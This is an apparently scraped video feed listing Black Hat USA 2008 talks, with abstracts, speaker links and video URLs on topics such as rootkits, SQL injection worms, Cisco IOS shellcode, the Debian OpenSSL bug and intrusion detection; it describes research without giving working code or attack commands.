This session consists of a combination of active research conducted by the presenter as well as discussion on how current threats may be customized. In order to determine the impact of typo squatting and domain name speculation, for example, we performed an analysis of 2008 presidential election candidate web sites and discovered numerous examples of abuse.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Friedrichs feedback@blackhat.com Computer 5C1ECA9E-D8EA-403B-BB81-DD8B63F9BFD2-22589-0002DDA88BAC9465-FFA Sun, 15 Mar 2009 22:43:24 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Friedrichs/black-hat-usa-08-friedrichs-electionthreats-hires.m4v 1:08:50 Black Hat, Oliver Friedrichs, Election, Threats, Attacks, Privacy, Phishing feedback@blackhat.com no
Black Hat USA 2008: Eric Filiol - Passive and Active Leakage of Secret Data from Non Networked Computer part 2 This talk addresses the issue of stealing data from computer or systems that are never or quite never connected to any network, due to their critical status. The security target assumes that the attacker may have a very limited direct (physical access) or indirect access (through any innocent user) to the computer, for a very small amount of time and at the initial part of his attack. His problem is to collect data from the computer he manages to compromise (active attack) or which has been identified as containing some exploitable weakness, but without using any network connection (including wireless -- WiFi, Bluetooth... -- communication protocols).<br /> <br /> In this talk we are going to recall the very few open existing techniques and then present some new approaches that we design in our lab, based on mathematical signal treatment. A demo will be made with respect to our new technique. https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Filiol feedback@blackhat.com Conputer C0C16ED3-9EBA-4952-8E3B-9DBB59F680D6-22589-0002DD7892ED1768-FFA Sun, 15 Mar 2009 22:35:22 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Filiol/black-hat-usa-08-filiol-passiveandactiveleakage2-hires.m4v Black Hat USA 2008: Eric Filiol - Passive and Active Leakage of Secret Data from Non Networked Computer part 2 This talk addresses the issue of stealing data from computer or systems that are never or quite never connected to any network, due to their critical status. The security target assumes that the attacker may have a very limited direct (physical access) or indirect access (through any innocent user) to the computer, for a very small amount of time and at the initial part of his attack. 
His problem is to collect data from the computer he manages to compromise (active attack) or which has been identified as containing some exploitable weakness, but without using any network connection (including wireless -- WiFi, Bluetooth... -- communication protocols). In this talk we are going to recall the very few open existing techniques and then present some new approaches that we design in our lab, based on mathematical signal treatment. A demo will be made with respect to our new technique. 36:31 Black Hat,Eric Filiol,Passive Leakage, Active Leakage feebcak@blackhat.com no Black Hat USA 2008: Eric Filiol - Passive and Active Leakage of Secret Data from Non Networked Computer part 1 This talk addresses the issue of stealing data from computer or systems that are never or quite never connected to any network, due to their critical status. The security target assumes that the attacker may have a very limited direct (physical access) or indirect access (through any innocent user) to the computer, for a very small amount of time and at the initial part of his attack. His problem is to collect data from the computer he manages to compromise (active attack) or which has been identified as containing some exploitable weakness, but without using any network connection (including wireless -- WiFi, Bluetooth... -- communication protocols).<br /> <br /> In this talk we are going to recall the very few open existing techniques and then present some new approaches that we design in our lab, based on mathematical signal treatment. A demo will be made with respect to our new technique. 
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Filiol feedback@blackhat.com Computer DA0F7F70-59D8-463A-AD25-8C5C9AADCCFA-22589-0002DD3EF9594784-FFA Sun, 15 Mar 2009 22:31:55 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Filiol/black-hat-usa-08-filiol-passiveandactiveleakage1-hires.m4v Black Hat USA 2008: Eric Filiol - Passive and Active Leakage of Secret Data from Non Networked Computer part 1 This talk addresses the issue of stealing data from computer or systems that are never or quite never connected to any network, due to their critical status. The security target assumes that the attacker may have a very limited direct (physical access) or indirect access (through any innocent user) to the computer, for a very small amount of time and at the initial part of his attack. His problem is to collect data from the computer he manages to compromise (active attack) or which has been identified as containing some exploitable weakness, but without using any network connection (including wireless -- WiFi, Bluetooth... -- communication protocols). In this talk we are going to recall the very few open existing techniques and then present some new approaches that we design in our lab, based on mathematical signal treatment. A demo will be made with respect to our new technique. 52:49 Black Hat,Eric Filiol,Passive Leakage, Active Leakage feedback@blackhat.com no Black Hat USA 2008: Arian Evans - Encoded, Layered, and Trancoded Syntax Attacks: Threading the Needle past Web Application Security Controls Learn how to breathe new life into your old web application zero-day syntax attacks. Even learn how to alert(document.cookie) with new-found panache.

By properly encoding, double-encoding, and triple-encoding, or by utilizing newer undocumented, transcoding-attacks, it is possible to bypass many common web application security controls to successfully exploit the target parser.

Most importantly: These attacks are being used in the wild, right now, today. Starting in February 2008 the first double-encoded, layer mass SQL Injection attacks were discovered in the wild. As of May 1st they have compromised over 600,000 websites.

This presentation will discuss how these attacks work:
+ from creation
+ to exploit
+ to dependencies;
+ what software they target;

Finally we will demonstrate how to resolve these issues through modern software design and coding practices.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Evans feedback@blackhat.com Computer 4CC3B256-A07C-49CC-B939-C0A9E2183B84-22589-0002DD0C1681782F-FFA Sun, 15 Mar 2009 22:27:49 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Evans/black-hat-usa-08-evans-encodingandtranscoding-hires.m4v 49:04 Black Hat, Arian Evans, Syntax Attacks, Encoding, Transcoding feedback@blackhat.com no
Black Hat USA 2008: Shawn Embleton and Sherri Sparks - A New Breed of Rootkit: The System Management Mode (SMM) Rootkit

Virtualization rootkits have been a hot topic for the past couple of years. In this talk, we will discuss a new type of malware with potentially even greater stealth: The System Management Mode (SMM) Rootkit. System Management Mode, a relatively obscure mode on Intel processors, provides an isolated memory and execution environment. SMM code is invisible to the Operating System yet retains full access to host physical memory and complete control over peripheral hardware. We will demo a proof of concept SMM rootkit that functions as a chipset level keylogger. Our rootkit hides its memory footprint, makes no changes to the host Operating System, and is capable of covertly exfiltrating sensitive data across the network while evading essentially all host based intrusion detection systems and firewalls.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Embleton feedback@blackhat.com Computer AB1892EC-2601-4297-9F88-C346AFE48FBE-22589-0002DCD6FEAB23AC-FFA Sun, 15 Mar 2009 22:24:01 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Embleton/black-hat-usa-08-embleton-smmrootkit-hires.m4v 1:05:36 Black Hat, Shawn Embleton, Sherri Sparks, Rootkit, System Management Mode feedback@blackhat.com no

Black Hat USA 2008: Chris Eagle and Tim Vidas - Next Generation Collaborative Reversing with Ida Pro and CollabREate

A major drawback with the use of most reverse engineering tools is that they were not designed with collaboration in mind. Numerous kludgy solutions exist, from asynchronous use of the same data files to working on multiple copies of data files which quickly diverge, leaving the differences to somehow be reconciled. Pedram Amini's Ida Sync provided a first step towards automated collaboration among Ida users; however, Ida Sync suffers from several shortcomings, including the fact that it has failed to keep pace with the evolution of Ida's internal architecture. In this presentation, the authors present a new tool titled collabREate, designed to bring nearly effortless collaboration to Ida users. The talk will include discussion of the IDA API and the ways in which it facilitates collaboration along with the ways in which it hinders collaboration. The design of a robust server component, responsible for managing projects and connected clients, will also be discussed along with a number of capabilities beyond simple collaboration that are enabled via the collabREate architecture.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Eagle feedback@blackhat.com Computer ACD7DAB4-95FD-48C8-92E6-6FF896669FDE-22589-0002DC8431ADADCF-FFA Sun, 15 Mar 2009 22:19:35 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Eagle/black-hat-usa-08-eagle-nextgenreversing-hires.m4v 49:24 Black Hat, Chris Eagle, Tim Vidas, Next Generation Collaborative Reversing, Ida Pro, Collabreate, Reverse Engineering feedback@blackhat.com no

Black Hat USA 2008: Nitesh Dhanjani and Billy Rios - Bad Sushi: Beating Phishers at Their Own Game

This talk will expose the tools and tactics used in the phishing underground.
What started as a simple examination of phishing sites turned into an extraordinary view of the ecosystem that supports the phishing effort that plagues modern day financial institutions and their customers.

Follow us as we track real life phishers hiding in the shadiest corners of the Internet, analyze the tools used by phishers, determine if these phishers are really the Einsteinian Ninja Hackers the media portrays them to be, uncover how phishers phish other phishers, and discover the sites where real life identities are being bought and sold.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Dhanjani feedback@blackhat.com Computer DFB94480-A167-418E-A3F6-6ED49392AD8E-22589-0002DB55F0A6100C-FFA Sun, 15 Mar 2009 21:56:24 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Dhanjani/black-hat-usa-08-dhanjani-badsushi-hires.m4v 1:01:19 Black Hat, Nitesh Dhanjani, Billy Rios, Phishing, Malware feedback@blackhat.com no

Black Hat USA 2008: Jared DeMott - AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation part 2

For many years hackers have been reversing code, scanning source, fuzzing applications, and crafting lethal exploits.
It’s time for security researchers, consultants, testers, and administrators to freshen up their skills by walking back through the computer science fundamentals of these techniques. This is a Deep Knowledge lecture series intended to bring newbs up from the ground, and to hone and challenge pros that have been at it for a while. Bring your Red Bull as former Prof. DeMott walks through 6 lectures that he designed for his security class.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#DeMott feedback@blackhat.com Computer 7ADCD0A2-C167-4F44-BA91-B7A798FADC6A-22589-0002DB2C2542E4D5-FFA Sun, 15 Mar 2009 21:52:37 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-DeMOtt/black-hat-usa-08-demott-appsec2-hires.m4v 1:10:37 Black Hat, Jared DeMott, AppSec, Reverse Engineering, Source Code Auditing, Fuzzing, Exploitation feedback@blackhat.com no

Black Hat USA 2008: Jared DeMott - AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation part 1

For many years hackers have been reversing code, scanning source, fuzzing applications, and crafting lethal exploits. It’s time for security researchers, consultants, testers, and administrators to freshen up their skills by walking back through the computer science fundamentals of these techniques.
This is a Deep Knowledge lecture series intended to bring newbs up from the ground, and to hone and challenge pros that have been at it for a while. Bring your Red Bull as former Prof. DeMott walks through 6 lectures that he designed for his security class.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#DeMott feedback@blackhat.com Computer 8B2F898D-B39E-43CC-9067-88C1F2D37D8E-22589-0002DAF4930B49DA-FFA Sun, 15 Mar 2009 21:49:47 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-DeMott/black-hat-usa-08-demott-appsec1-hires.m4v 53:23 Black Hat, Jared DeMott, AppSec, Reverse Engineering, Source Code Auditing, Fuzzing, Exploitation feedback@blackhat.com no

Black Hat USA 2008: Bruce Dang - Methods for Understanding Targeted Attacks with Office Documents

As more security features and anti-exploitation mechanisms are added to modern operating systems, attackers are changing their targets to higher-level applications. In the last few years, we have seen increasing targeted attacks using malicious Office documents against both government and non-government entities. These attacks are well publicized in the media; unfortunately, there is not much public information on attack details or exploitation mechanisms employed in the attacks themselves.
This presentation aims to fill the gap by offering:
(1) A brief overview of the Office file format.
(2) In-depth technical details and practical analytical techniques for triaging and understanding these attacks.
(3) Defensive mechanisms to reduce the effectiveness of the attacks.
(4) Forensics evidence that can help trace the attacks.
(5) [If we have time] Static detection mechanism for these vulnerabilities (i.e., how to write virus signatures for these vulns).
(6) Techniques to help detect these attacks on the wire.
(7) A surprise. :)

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Dang feedback@blackhat.com Computer 44744226-3CD0-48A1-B691-2658C4D71339-22589-0002DAA54C1DD717-FFA Sun, 15 Mar 2009 21:43:56 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Dang/black-hat-usa-08-dang-targetedattacks-officedocs-hires.m4v 39:09 Black Hat, Bruce Dang, Targeted Attacks, Microsoft Office, Documents feedback@blackhat.com no

Black Hat USA 2008: Jesse D'Aguanno - iRK - Crafting OS X Kernel Rootkits

Over the last few years, OS X has captured much attention in the security industry. Techniques in shellcode development, exploits, etc. have been widely publicized and spoken on, yet the subject of covertly maintaining access once gained has not been adequately covered.

This talk will build on previous rootkit research, applying rootkit and kernel subversion techniques from the Windows, Linux and BSD worlds to Apple's OS X operating system as well as taking advantage of some of the unique features of OS X. It will detail topics such as: Introducing code into the XNU kernel (Basic KEXT development), Hooking, Direct Kernel Object Manipulation, Patching Running Kernel Memory, etc. It will cover some of the pitfalls encountered while developing rootkits for OS X and how to overcome them.

Finally, we will combine these techniques and demonstrate a useful PoC rootkit which can form the foundation for your own real-world rootkit.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#D'Aguanno feedback@blackhat.com Computer 19FB33DE-731E-4F2E-A681-85EABEBD5B5D-22589-0002DA78A4A28823-FFA Sun, 15 Mar 2009 21:40:03 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-D'aguanno/black-hat-usa-08-d'aguanno-iRK-hires.m4v 1:14:49 Black Hat, Jesse D'Aguanno, iRK, OS X, Kernel Rootkits feedback@blackhat.com no

Black Hat USA 2008: Greg Conti and Erik Dean - Visual Forensic Analysis and Reverse Engineering of Binary Data

For decades hex was the common tongue of reverse engineers and forensic analysts, but we can do better. Hex editors are the Swiss Army knives of low level analysis and have evolved significantly, but are now at a local maximum. With the tiny textual window hex provides, it is difficult, if not impossible, to understand the big picture context and inner workings of binary objects - files, file systems, process memory, and network traffic. While there are helpful tools to analyze the special case of executable files, little work exists to help address the general case of _all_ types of binary objects. This talk presents visual approaches to improve the art and science of forensic analysis, diffing, and reverse engineering, both in the context independent case where little is known about the raw structure of the binary data and at the semantic level where external knowledge can be used to inform analysis.
Two open source visual analysis tools, each with a different perspective on visual reverse engineering and forensics, will be demonstrated and released, as well as a comprehensive survey of security visualization systems. If you read hex, you should attend this talk.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Conti feedback@blackhat.com Computer E0974E4E-2F94-4F41-BE12-1F1757FBCA64-22589-0002DA180BCC77E7-FFA Sun, 15 Mar 2009 21:44:27 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Conti/black-hat-usa-08-conti-visualforensics-hires.m4v 1:00:33 Black Hat, Greg Conti, Erik Dean, Visual Forensic Analysis, Reverse Engineering, Binaries feedback@blackhat.com no

Black Hat USA 2008: Justin Clarke - SQL Injection Worms for Fun and Profit

Earlier this year the first (publicly known) SQL Injection worm appeared. This worm used SQL Injection to insert malicious scripting tags into the pages of over 90,000 sites that were vulnerable to SQL injection.

Yet the exploit vector was fairly innocuous, easy to clean up, and easy to block. In other words, very much version 0.1 of what a SQL Injection worm can achieve.

This talk is going to discuss how far the rabbit hole can go with SQL injection based worms, including full compromise of the server OS, and why we should be worried by what is going to be coming next out of Russia/China/wherever, including a live demo of a proof of concept SQL injection worm, "weaponized".

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Clarke feedback@blackhat.com Computer 2E370639-3BA5-4A56-BABF-CECB7EBD4A62-22589-0002D9E22E7B9BBC-FFA Sun, 15 Mar 2009 21:34:26 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Clarke/black-hat-usa-08-clarke-SQLinjection-hires.m4v 25:12 feedback@blackhat.com no

Black Hat USA 2008: Gyan Chawdhary and Varun Uppal - Cisco IOS Shellcodes/Backdoors

It has been more than three years since Michael Lynn first demonstrated a fully interactive shell code at Blackhat 2005 for Cisco's proprietary Internetworking Operating System (IOS). However, due to the legal obligations imposed by Cisco and ISS, the technical information surrounding this research could not be revealed in greater detail, which stifled continued security research in this area. The presentation will cover significant advances in IOS shell code development and look at its subsequent impact on modern day routing infrastructure. IOS specific payloads including bind shell, reverse shell, 2 byte shell codes and bypassing the check heaps process in IOS 12.4 shall all be covered from both a practical and theoretical standpoint, as well as a detailed overview of IRM's techniques used to develop these payloads. Furthermore, building a complete IOS debugging environment and identifying new attack vectors will also be covered in the presentation, allowing researchers to establish a fully working environment to develop IOS specific code, execution payloads, memory resident backdoors and to conduct vulnerability research on Cisco embedded devices.

https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Chawdhary feedback@blackhat.com Computer 10AE72CD-2606-4978-B6E7-835F12FF54AA-22589-0002D9ACB3679664-FFA Sun, 15 Mar 2009 21:34:36 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Chawdhary/black-hat-usa-08-chawdhary-IOSshellcode-hires.m4v 46:06 Black Hat, Gyan Chawdhary, Varun Uppal, Cisco IOS, Shellcodes, Backdoors feedback@blackhat.com no

Black Hat USA 2008: Jacob Carlson and Kevin Stadmeyer - FLEX, AMF 3 and BlazeDS: An Assessment

Adobe FLEX with BlazeDS offers developers a streamlined application development paradigm, letting them create rich Internet applications with little exertion. As always, though, ease of implementation often results in incomplete engineering. In this presentation Jacob Carlson and Kevin Stadmeyer offer their assessment of the FLEX and BlazeDS application architectures as well as a detailed examination of the Action Message Format version 3. We will provide developers and administrators clear examples of how to do things wrongly, how to do them rightly and explain exactly how each component works internally.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Carlson feedback@blackhat.com Computer 2F874844-681B-40AE-84BC-AFF30A309441-22589-0002D97101BE7E16-FFA Sun, 15 Mar 2009 21:34:45 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Carlson/black-hat-usa-08-carlson-flex-amf3-BlazeDS-hires.m4v 1:02:31 Black Hat, Jacob Carlson, Kevin Stadmeyer, Flex, AMF 3, BlazeDS, Adobe, Action Message Format feedback@blackhat.com no

Black Hat USA 2008: Yuriy Bulygin - Insane Detection of Insane Rootkits: Chipset Based Approach to Detect Virtualization Malware

This work introduces an approach to detect hardware-assisted virtualization malware different from currently developed techniques. It uses hardware capabilities of an embedded microcontroller inside the chipset's north-bridge to detect virtualization malware, and to go beyond detection and remove it from the system. We will discuss advantages and other potential applications of the approach, possible attacks evading detection, and solutions.

This talk will also include a demo of DeepWatch, a proof of concept detector of VT-x based virtualization rootkits implemented in north-bridge firmware.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Bulygin feedback@blackhat.com Computer 10D7587D-3D04-4AC4-8165-EA5B0B04829B-22589-0002D9108FE39C4D-FFA Sun, 15 Mar 2009 21:45:47 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Bulygin/black-hat-usa-08-bulygin-deepwatch-hires.m4v 55:16 Black Hat, Yuriy Bulygin, Chipsets, Virtualization, Malware, Rootkits feedback@blackhat.com no

Black Hat USA 2008: Ivan Beutler - SmartCard APDU Analysis

SmartCards are commonly used for authentication, or for securing e-mails or transactions. The concept armors crypto functions in a tamper proof architecture. Software cannot be protected by Software - and this paradigm forces the need for secure devices. But how does it work? How does a Windows computer communicate with the SmartCard device? Can hackers inject malware in between the communication? This presentation addresses these items. The Compass Security APDU debugger allows you to halt, alter, and intercept APDU commands and disclose hidden secrets. The APDU debugger is part of the presentation.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Buetler feedback@blackhat.com Computer 2A6FEA69-B990-4DF5-B3CB-F6D4A0DECBBB-22589-0002D90C7F63FD1D-FFA Sun, 15 Mar 2009 21:34:58 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Buetler/black-hat-usa-08-buetler-smartcardAPDU-hires.m4v 1:02:15 Black Hat, Ivan Beutler, Smart Cards, APDU, cryptography feedback@blackhat.com no

Black Hat USA 2008: Joshua Bienfang - Free-Space Quantum Key Distribution at GHz Transmission Rates

Quantum mechanics makes possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks.
Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Dr. Joshua Bienfang will give a Turbo Talk on quantum encryption at Black Hat at 4:45 p.m. on Thursday, August 7. This demo to run 1330 to 1930 on Wednesday, 1200 to 1800 on Thursday, in Turin Room located on the Third Floor. For further information, see http://havephotonswilltravel.com https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Bienfang feedback@blackhat.com Computer 593F2790-EB57-43E1-A328-92E90A5227E2-22589-00028EDF6845CBE9-FFA Sun, 15 Mar 2009 21:35:06 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Bienfang/black-hat-usa-08-bienfang-quantumkeydist-hires.m4v Black Hat USA 2008: Joshua Bienfang - Free-Space Quantum Key Distribution at GHz Transmission Rates Quantum mechanics make possible some things that are impossible in the "classical" world of ordinary experience, and which even seem to contradict common sense. Some of these spooky effects are coming into practical use in security applications. The Quantum Spookshow of the National Institute of Standards and Technology (NIST) and the National University of Singapore (NUS) demonstrates quantum cryptography and quantum entanglement on a four-node quantum network, which supports quantum encrypted streaming video and violations of local realism. Participants are encouraged to interact with the light beams that constitute the physical link of this network, and to meet physicists who have designed and built quantum networks. Quantum mechanics provides methods of encryption that are secure from eavesdropping attacks against the quantum channel, but in any actual system there are points of vulnerability, e.g. 
correlations of classical noise in the operation of quantum elements. Participants will have a chance to discover vulnerabilities by hands-on interaction with our systems. Dr. Joshua Bienfang will give a Turbo Talk on quantum encryption at Black Hat at 4:45 p.m. on Thursday, August 7. This demo to run 1330 to 1930 on Wednesday, 1200 to 1800 on Thursday, in Turin Room located on the Third Floor. For further information, see http://havephotonswilltravel.com 16:05 Black Hat, Joshua Bienfang, NIST,Free-Space Quantum Key Distribution feedback@blackhat.com no Black Hat USA 2008: Ohad Ben-Cohen - No More 0-Days (or Code-Based Intrusion Detection by Korset)
In order to identify malicious activity, Host-based Intrusion Detection Systems often monitor the system calls emitted by a process, and then compare them to a pre-constructed model of normal behavior. The model can either be learned during a training session, or manually written by the user. Alas, the former suffers from false positives, and therefore repeatedly requires user intervention, and the latter is tedious and demanding.

In this talk we present an automated, zero-false-alarm, whitebox approach that effectively targets 0-day code injection exploits:

By statically analyzing an application's source/object code, we build its control flow graph (CFG), which is then used by the kernel to verify the legitimacy of the issued system calls and their order. This method enjoys a powerful property of provable zero false positives, since a deviation from a (non-self-modifying) program's CFG can only be explained as an intrusion.

We present Korset, an Open Source Linux prototype which implements this approach via:

* An automatic analyzer that builds the CFG as part of the compilation process
* A kernel agent that enforces the policy induced by the CFG, and terminates subverted processes.

We have successfully used Korset to automatically construct CFGs for the entire GNU C library, and demonstrated its ability to block buffer overflow attacks.

Korset introduces a viable IDS methodology that can stop future, or publicly unknown, exploits. Furthermore, run-time performance measurements of Korset show negligible overheads.

In collaboration with Avishai Wool, Tel-Aviv University.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Ben-Cohen feedback@blackhat.com Computer 6B08A00A-9D30-4233-9B94-56442B6C641E-22589-00028E86A52559B0-FFA Sun, 15 Mar 2009 21:35:17 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Ben-Cohen/black-hat-usa-08-ben-cohen-nomore0days-hires.m4v 1:00:02 Black Hat, Ohad Ben-Cohen, Korset feedback@blackhat.com no
Black Hat USA 2008: John Benson - When Lawyers Attack: Dealing With the New Rules of Electronic Discovery part 2
The legal community is slowly accepting that the changes to the Federal Rules which change the law's approach to electronic evidence are not going away. Vendors are clamoring to sell their e-discovery "solutions" to law firms and corporations alike, often taking advantage of the uncertainty that comes with such sweeping changes to the law.
The changes to the Federal Rules change the way in which individuals and organizations approach their data much in the same way Sarbanes-Oxley has over the past few years. Instead of merely creating compliance headaches for security professionals, however, these changes take data security out of the hands of those charged to protect it and spread data to the wind.
More frightening for individuals doing security research is the fact that these rules apply to the one-man research operation in the same way as to the multimillion-dollar conglomerate.
This talk outlines how the electronic discovery process works, why it is costing corporations millions of dollars (but doesn't have to), and will empower attendees with the knowledge they need to deal with this new legal environment.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Benson feedback@blackhat.com Computer 6FCAC5DD-1170-48C7-9792-FA64C5CCD6B4-22589-00028E36F58D9683-FFA Sun, 15 Mar 2009 21:35:25 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Benson/black-hat-usa-08-benson-lawyersattack-2-hires.m4v 1:11:51 Black Hat, John Benson, Electronic Discovery no
Black Hat USA 2008: John Benson - When Lawyers Attack: Dealing With the New Rules of Electronic Discovery part 1
The legal community is slowly accepting that the changes to the Federal Rules which change the law's approach to electronic evidence are not going away. Vendors are clamoring to sell their e-discovery "solutions" to law firms and corporations alike, often taking advantage of the uncertainty that comes with such sweeping changes to the law.
The changes to the Federal Rules change the way in which individuals and organizations approach their data much in the same way Sarbanes-Oxley has over the past few years. Instead of merely creating compliance headaches for security professionals, however, these changes take data security out of the hands of those charged to protect it and spread data to the wind.
More frightening for individuals doing security research is the fact that these rules apply to the one-man research operation in the same way as to the multimillion-dollar conglomerate.
This talk outlines how the electronic discovery process works, why it is costing corporations millions of dollars (but doesn't have to), and will empower attendees with the knowledge they need to deal with this new legal environment.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Benson feedback@blackhat.com Computer CADF2F14-1566-4052-80CC-1B3A26A030AC-22589-00028DD57C639625-FFA Sun, 15 Mar 2009 21:35:35 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Benson/black-hat-usa-08-benson-lawyersattack-1-hires.m4v 54:06 Black Hat, John Benson, Electronic Discovery no
Black Hat USA 2008: Luciano Bello and Maximiliano Bertacchini - Predictable RNG in the Vulnerable Debian OpenSSL package, the What and the How
Recently, the Debian project announced an OpenSSL package vulnerability which they had been distributing for the last two years. This bug makes the PRNG predictable, affecting the keys generated by openssl and every other system that uses libssl (e.g. openssh, openvpn). We will talk about this bug, its discovery and publication, its consequences, and exploitation. We will also demonstrate some exploitation tools.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Bello feedback@blackhat.com Computer C451E8A8-593C-4A8B-AAD4-6E35E0E47F00-22589-00028C851AFE4BE5-FFA Sun, 15 Mar 2009 21:35:45 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Bello/black-hat-usa-08-bello-predictablePRNG-hires.m4v
1:06:45 Black Hat, Debian, OpenSSL, PRNG, Luciano Bello, Bertacchini feedback@blackhat.com no
Black Hat USA 2008: Tiller Beauchamp and David Weston - RE:Trace - Applied Reverse Engineering on OS X
This presentation will detail the newest developments in RE:Trace, a reverse engineering framework based on Ruby and DTrace. We will discuss implementations for walking and searching the heap on OS X, tracing for kernel and driver vulnerabilities, pinpointing format string bugs and leveraging custom application probes, such as those built into browser and database software.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Beauchamp feedback@blackhat.com Computer DED9311E-0A99-4381-BC17-5D044B62120C-22589-00028C20339EC235-FFA Sun, 15 Mar 2009 21:35:57 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Beauchamp/l/black-hat-usa-08-beauchamp-RETrace-hires.m4v 1:02:54 Black Hat, Tiller Beauchamp, David Weston, RE:Trace, OS X, Ruby no
Black Hat USA 2008: Dan Bailey and Martin Mocko - Winning the Race to Bare Metal – UEFI Hypervisors
Combining UEFI with hypervisors paves the way for a new class of vulnerability. We will present a discussion and demonstration on the threat and opportunity that UEFI-based hypervisors pose to and for system security. The emerging support for UEFI in commodity OSes (Microsoft Vista SP1) makes a rich set of pre-OS capabilities possible. The advent of processors that support virtualization in silicon over the past few years has made high-performing commodity hypervisors a reality. We will discuss and demonstrate loading a hypervisor via the pre-OS features of UEFI.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Bailey feedback@blackhat.com Computer 365F67B9-0A75-4546-9D22-378ED4F424B1-22589-00028BA80FBFD592-FFA Sun, 15 Mar 2009 21:36:09 -0700 https://media.blackhat.com/bh-usa-08/video/bh-us-08-Bailey/black-hat-usa-08-bailey-UEFI-hires.m4v 18:18 Black Hat, Turbo Talk, UEFI, Hypervisor, Virtualization, Dan Bailey, Martin Mocko feedback@blackhat.com no
Black Hat USA 2008: Mike Zusman - Leveraging the Edge: Abusing SSL VPNs
Internet-facing SSL VPNs and Open Reverse Proxies can be abused to perform reconnaissance, data extraction, or general mischief INSIDE the Corporate Intranet and on SSL VPN clients. Such security devices are usually thought to add security to the enterprise network, while the increased client-side attack surface from required mobile code (ActiveX/Java) goes ignored.
This presentation will discuss programming and infrastructure flaws permitting abuse of the server, remote code execution on vulnerable clients, as well as appropriate countermeasures.
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-speakers.html#Zusman Computer 357637EB-05D4-4ADD-BBC8-F2CA15E03E3A-22589-000283BC1B1EC998-FFA Sun, 15 Mar 2009 21:36:19 -0700 https://media.blackhat.com/bh-usa-08/video-bh-us-08-Zusman/black-hat-usa-08-zusman-abusingSSLVPNs-hires.m4v 1:09:32 Black Hat, Zusman, SSL, VPN, Open Reverse Proxies no
Black Hat USA 2008: Joanna Rutkowska and Rafal Wojtczuk - Preventing and Detecting Xen Hypervisor Subversions
We discuss various anti-subverting techniques (IOMMU/VT-d, Xen’s driver and stub domains, etc.) and whether they really can protect the Xen (or similar) hypervisor from compromises. After demonstrating that those mechanisms can be bypassed, we will switch to discussing hypervisor integrity scanning and will present some prototype solutions to this problem.
This presentation is the second one in the series of three talks about Xen (in)security presented by Invisible Things Lab at this year’s Black Hat, collectively referred to as the “Xen 0wning trilogy”. It is recommended that the audience attend the “Subverting the Xen hypervisor” presentation before coming to this talk. The follow-up presentation is titled “Bluepilling the Xen hypervisor”.
